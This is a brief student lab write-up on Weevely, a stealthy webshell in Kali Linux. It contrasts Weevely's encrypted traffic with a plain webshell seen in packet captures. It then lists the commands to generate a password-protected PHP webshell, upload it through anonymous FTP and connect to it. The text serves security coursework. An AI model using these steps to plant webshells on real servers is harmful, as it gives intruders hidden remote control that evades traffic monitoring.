Tool Usage has additional help on how to use Weevely.

This lab is primarily focused on exploring the stealthy webshell, Weevely. It is a tool built into Kali linux, and allows for simplified use and lets the user enter a command prompt rather than passing commands via a URL. Decoding the packet captures was a really interesting way to show the difference between the webshell we created last week vs. Weevly webshells, as the Weevely one encrypts the traffic so you cannot tell what is going on or what commands are being passed via a packet capture.

• First, make sure Weevely is installed. Can be installed with sudo apt-get install weevely
• Once installed, generate a weevely file with weevely generate <password> <filename>.php
• Now, you need to upload the php file via FTP to the web server.
  • Start by using ftp <address> and log in. In our case, you can log in as anonymous with password guest.
  • Navigate to /upload, and run put <filename>.php to upload the weevely file.
• Now exit the FTP server, and run weevely http://<address>/upload/<filename>.php <password to initiate the webshell.

---